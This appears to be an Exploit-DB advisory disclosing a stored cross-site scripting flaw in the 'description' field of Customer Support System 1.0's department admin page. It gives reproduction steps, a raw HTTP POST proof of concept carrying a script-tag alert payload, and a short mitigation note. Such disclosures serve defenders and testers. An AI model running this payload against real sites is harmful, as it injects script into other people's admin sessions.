Customer Support System 1.0 - 'description' Stored XSS in The Admin Panel

vendor:

Customer Support System

by:

Ahmed Abbas

7.5

CVSS

HIGH

Stored XSS

CWE

Product Name: Customer Support System

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: NO

Related CWE: N/A

CPE: a:sourcecodester:customer_support_system:1.0

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4

2020

Customer Support System 1.0 – ‘description’ Stored XSS in The Admin Panel

A stored XSS vulnerability exists in the Customer Support System 1.0 application. An attacker can exploit this vulnerability by navigating to http://TARGET/customer_support/index.php?page=department_list, clicking on new Department, and adding the XSS payload into the 'description' parameter value. Browsing to the post will trigger the XSS payload.

Mitigation:

Input validation should be used to prevent XSS attacks. All user-supplied input should be validated and filtered for malicious content.

Source

Exploit-DB raw data:

# Exploit Title: Customer Support System 1.0  - 'description' Stored XSS in The Admin Panel
# Date: 2020-11-11
# Exploit Author: Ahmed Abbas
# Vendor Homepage: https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4


Stored XSS Reproduction Steps:
1. Navigate to http://TARGET/customer_support/index.php?page=department_list
2. Click on new Department
3. Add the XSS payload into the "description" parameter value
4. Browse to the post to trigger the XSS payload

# POC

POST /customer_support/ajax.php?action=save_department HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------196034062430192961002574272606
Content-Length: 445
Origin: http://localhost
Connection: close
Referer: http://localhost/customer_support/index.php?page=department_list
Cookie: PHPSESSID=6dbp44u1fs8f0ndfqutpn3lbuq

-----------------------------196034062430192961002574272606
Content-Disposition: form-data; name="id"

4
-----------------------------196034062430192961002574272606
Content-Disposition: form-data; name="name"

Stored xss
-----------------------------196034062430192961002574272606
Content-Disposition: form-data; name="description"

<script>alert("STORED XSS")</script>
-----------------------------196034062430192961002574272606--